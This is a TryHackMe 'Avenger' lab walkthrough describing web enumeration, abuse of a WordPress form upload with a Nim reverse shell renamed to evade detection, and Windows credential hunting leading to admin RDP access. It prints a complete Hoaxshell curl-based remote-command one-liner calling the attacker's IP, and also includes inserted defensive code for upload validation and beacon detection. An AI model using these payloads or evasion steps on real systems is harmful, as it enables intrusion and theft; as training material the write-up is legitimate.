TryHackMe Avenger - Walkthrough

Akbar Khan

Enumeration

After connecting to the VPN I got this IP as my target: 10.10.159.180. So, first things first, Network Mapper:

nmap -p- -sV 10.10.159.180 -vv

As the box description indicates, you've been asked to exploit all the vulnerabilities present. Let's go for port 80 first.

While enumerating the directory listing, I visited each available path individually. Upon clicking the "Gift" directory, I was redirected to a domain: http://avenger.tryhackme/gift/

This indicated that the IP address is mapped to a custom domain (avenger.tryhackme). To access it properly in the browser, I added the following entry to my /etc/hosts file:

sudo nano /etc/hosts
10.10.159.180 avenger.tryhackme

And now we are able to access the URL http://avenger.tryhackme/gift/

I next ran my standard web app enumeration commands.

dirb http://10.10.159.180/ /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://10.10.159.180 -w /usr/share/wordlists/dirb/common.txt
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.159.180/FUZZ -fw 1
nikto -h http://10.10.159.180

(dirb takes the wordlist as a positional argument, not via -w. In the ffuf command, -fw 1 ignores responses with only one word, filtering out noise.)

I found a few things:

The ComputerName seems to be "gift".
Apache/2.4.56 (Win64) with PHP/8.0.28 is running.
The website is running on PHP.

This gave me the indication to run wpscan:

wpscan --url http://avenger.tryhackme/wordpress/ --enumerate p

Result:
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

Rerun the scan using an API token:
wpscan --url http://avenger.tryhackme/wordpress/ --enumerate p --api-token <your_token>

Let's visit http://avenger.tryhackme/wordpress/wp-content/uploads/

Then I tried the default wp-login.php to find a login page,

and here we got a login page, where I found a valid username, "admin".

This can be a potential entry point for initial access.

Initial Access

I initially struggled with this part of the challenge: I completely missed that the Forminator plugin was the key to gaining initial access. Since I'm still improving at web app exploitation, I didn't realize the significance of the form embedded at the bottom of the http://avenger.tryhackme/gift page.

After digging deeper (and with help from the hint by andrea526), I understood the trick:
➡️ The Forminator form allows file uploads via an "Attach File" button.
➡️ Behind the scenes, the vulnerable VM simulates a user who opens/clicks any uploaded file.

This behavior can be exploited by uploading a malicious file.
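From the defender's side, the fix for this upload path is server-side validation that does not trust the file name. The following is an added example for this walkthrough (not the Forminator plugin's own code; the list of accepted formats is an assumption): it rejects executables by their MZ/PE header, so renaming rev_shell.exe to calculator.exe, or even calculator.png, would not get it through.

```python
"""Server-side check for a form that accepts attachments, like the Forminator
form on /gift. Added example for this walkthrough, not the plugin's own code:
extension alone is not enough, so the leading bytes are checked as well."""
import struct
from typing import Optional, Tuple

# Constructed policy: what a gift-request form can reasonably accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
ALLOWED_EXTENSIONS = set(MAGIC) | {"txt"}

def executable_kind(data: bytes) -> Optional[str]:
    """Return 'PE' for a Windows PE image, 'MZ' for a bare DOS stub, else None."""
    if data[:2] != b"MZ":
        return None
    if len(data) >= 0x40:
        # e_lfanew at offset 0x3C points to the 'PE\0\0' signature.
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "PE"
    return "MZ"

def content_matches_extension(ext: str, data: bytes) -> bool:
    """Check the leading bytes against the format the extension claims."""
    if ext == "txt":
        return b"\x00" not in data[:512]  # crude: text should contain no NUL bytes
    return data.startswith(MAGIC[ext])

def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an uploaded attachment may be stored; returns (ok, reason).
    Only the last extension counts, so 'calculator.png.exe' is still an .exe."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext or '?'} not allowed"
    kind = executable_kind(data)
    if kind:
        return False, f"content is a DOS/Windows executable ({kind} header)"
    if not content_matches_extension(ext, data):
        return False, f"content does not look like a .{ext} file"
    return True, "ok"

# Constructed stand-in for a compiled payload: MZ stub whose e_lfanew points at 'PE\0\0'.
FAKE_PE = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\x00\x00" + bytes(32)
```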

We will use Nim-Reverse-Shell.

Nim is a modern, statically-typed programming language that compiles to C, C++, or JavaScript. It's known for:

  • High performance like C/C++

  • Easy syntax like Python

  • Low antivirus detection (why attackers/red teamers use it)

First we need to set up Nim and mingw-w64:

apt install mingw-w64
apt install nim

Steps to set up Nim

curl https://nim-lang.org/choosenim/init.sh -sSf | sh

Step 1: Check Your Current Shell
echo $SHELL
If it shows something like /bin/zsh, you're using zsh.

Step 2: Edit the Right Shell File
nano ~/.zshrc
Add the following line at the end and save:
export PATH=/root/.nimble/bin:$PATH

Step 3: Reload the Shell Config
source ~/.zshrc
nim -v

Download the file rev-shell.nim and cross-compile it:

nim c -d:mingw --app:gui -d:release "-o:rev_shell.exe" reverse_shell.nim

This command compiles reverse_shell.nim into a Windows GUI executable named rev_shell.exe, with optimizations for speed (-d:release) and no console window (--app:gui). The -o: flag specifies the output filename; the quotation marks avoid shell parsing issues.

Let's rename rev_shell.exe to something more innocuous (e.g., calculator.exe) to help evade detection by security tools before uploading it to the target.

Now it's time to upload the file and wait for the shell. Make sure the listener is running on the given port.

Our listener is waiting on 443.

As we are hugo now, let's navigate to user.txt, our first flag.

Finding the “root” flag

Let's first enumerate our initial access.

That is where, according to me, our next flag resides. Currently we have no access.

Let's take Hoaxshell. Hoaxshell is a powerful and stealthy Windows reverse shell framework written in Python. It is designed for post-exploitation and red-teaming tasks, especially in environments where traditional reverse shells may get detected or blocked.

Steps to set up Hoaxshell

git clone https://github.com/t3l3machus/hoaxshell.git
cd hoaxshell
pip3 install -r requirements.txt
python3 -m venv hoaxenv
source hoaxenv/bin/activate
pip install -r requirements.txt

Download hoaxshell-listener.py as shown.

python3 hoaxshell-listener.py -t cmd-curl -p 8080

@echo off&cmd /V:ON /C "SET ip=10.17.7.239:8080&&SET sid="Authorization: eb6a44aa-8acc1e56-629ea455"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1" > NUL

Run this code in the victim's cmd shell that we obtained earlier.

Have a look at hoaxshell-listener.

Why did we use Hoaxshell instead of the normal reverse shell we already had?

We used Hoaxshell instead of a normal reverse shell because it is stealthier, harder to detect, and better suited for bypassing antivirus and EDR solutions. While normal shells (like Netcat or Meterpreter) create noisy, suspicious traffic that security tools can easily flag, Hoaxshell uses HTTP/S-based communication, making it look like regular web traffic. It's also fileless, runs entirely in memory using PowerShell, and can maintain longer persistence without raising alerts. In short, Hoaxshell helps achieve more stable and covert access to the target system.
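The flip side for defenders: the cmd-curl payload above polls one host roughly every second (the trailing timeout 1) with a fixed Authorization header that carries no scheme (no "Bearer" or "Basic"), and POSTs command output back to the same host. That cadence and header shape are exactly what a beacon hunt over proxy logs can pick out. This is an added example, not part of the walkthrough or the Hoaxshell project; the log format is constructed and the thresholds are assumptions.

```python
"""Beacon hunt over HTTP proxy logs. Added example for this walkthrough, not
part of Hoaxshell: it groups requests by client, host and Authorization value,
then flags scheme-less headers that poll on a near-constant interval."""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed log format: timestamp client method url authorization-header.
SAMPLE_LOG = """\
2025-01-01T10:00:00 10.10.159.180 GET http://10.17.7.239:8080/eb6a44aa eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:01 10.10.159.180 GET http://10.17.7.239:8080/8acc1e56 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:02 10.10.159.180 GET http://10.17.7.239:8080/8acc1e56 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:03 10.10.159.180 GET http://10.17.7.239:8080/8acc1e56 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:03.300 10.10.159.180 POST http://10.17.7.239:8080/629ea455 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:04 10.10.159.180 GET http://10.17.7.239:8080/8acc1e56 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:05 10.10.159.180 GET http://10.17.7.239:8080/8acc1e56 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:06 10.10.159.180 GET http://10.17.7.239:8080/8acc1e56 eb6a44aa-8acc1e56-629ea455
2025-01-01T10:00:00 10.10.159.180 GET https://updates.example.com/check Bearer c0nstructed
2025-01-01T10:00:07 10.10.159.180 GET https://updates.example.com/check Bearer c0nstructed
2025-01-01T10:00:30 10.10.159.180 GET https://updates.example.com/check Bearer c0nstructed
2025-01-01T10:01:10 10.10.159.180 POST https://updates.example.com/report Bearer c0nstructed
2025-01-01T10:02:00 10.10.159.180 GET https://updates.example.com/check Bearer c0nstructed
"""

STANDARD_SCHEMES = {"basic", "bearer", "digest", "negotiate", "ntlm"}

def find_beacons(lines, min_requests=5, max_jitter=0.5):
    """Group requests by (client, host, Authorization value) and flag groups that
    poll on a steady cadence with a scheme-less Authorization header."""
    groups = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, method, url, auth = line.split(maxsplit=4)
        host = url.split("/")[2]
        groups[(src, host, auth)].append((datetime.fromisoformat(ts), method))
    alerts = []
    for (src, host, auth), reqs in groups.items():
        if len(reqs) < min_requests or auth.split(" ", 1)[0].lower() in STANDARD_SCHEMES:
            continue
        times = sorted(t for t, _ in reqs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if pstdev(gaps) <= max_jitter:  # near-constant interval, like the payload's 'timeout 1'
            alerts.append({"src": src, "host": host, "auth": auth, "requests": len(reqs),
                           "interval": round(median(gaps), 2),
                           "posts": sum(1 for _, m in reqs if m == "POST")})
    return alerts
```

The POST at 10:00:03.300 shows why the check uses spread rather than exact spacing: output uploads land between polls but do not hide the one-second rhythm.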

In the example below I access Program Files using the normal reverse shell we got.

Accessible in Hoaxshell

In your normal reverse shell (e.g., Netcat or the raw Nim reverse shell), command parsing and execution are very basic. Quoted paths like "Program Files" may not be parsed or escaped correctly, so the space in "Program Files" ends up being treated as a command separator, causing a syntax error like:

OSError: The filename, directory name, or volume label syntax is incorrect.

This happens because most simple reverse shells just pass raw input to cmd.exe without proper escaping.

Why did it work in Hoaxshell?

Hoaxshell:

  • Uses PowerShell-based command execution, which handles quoted strings and complex commands more gracefully.

  • Maintains better input/output encoding, including whitespace and special characters.

  • Simulates an interactive shell-like experience, where commands like cd "Program Files" are interpreted just like in a normal command prompt.

Let's enumerate some more.

And I found some credentials.

Another juicy find:

C:\xampp\htdocs\gift> cmdkey /list

# Lists saved credentials (Windows Credential Manager) for remote desktop, network shares, or websites.

C:\xampp\htdocs\gift> reg query HKLM /f password /t REG_SZ /s

# Searches the HKEY_LOCAL_MACHINE registry hive recursively for values of type REG_SZ (string) containing the string "password".

And look what I found.

Let's use Remmina to get remote access.

And yes, we have a better foothold now.

As soon as I got RDP access I simply tried opening PowerShell as an administrator, and it worked.

I had missed one enumeration step earlier: checking the user's privileges.

hugo is already in the Administrators group.

Navigating to my root.txt flag.

Skills Practiced:
Web enumeration, WordPress plugin exploitation, file upload abuse, Nim malware compilation, reverse shell handling (Nim & Hoaxshell), Windows enumeration, RDP post-exploitation.


Written by Akbar Khan

Experienced Information Technology Professional | eLearn Security Certified Professional Penetration Tester (eCPPTv2) With 5 years of hands-on experience in the Information Technology and cybersecurity domains, I have developed a comprehensive skill set in Linux, Windows OS / Windows Server, and ethical hacking. My expertise extends to system security fundamentals such as Public Key Infrastructure (PKI), cryptography, and encryption/decryption algorithms.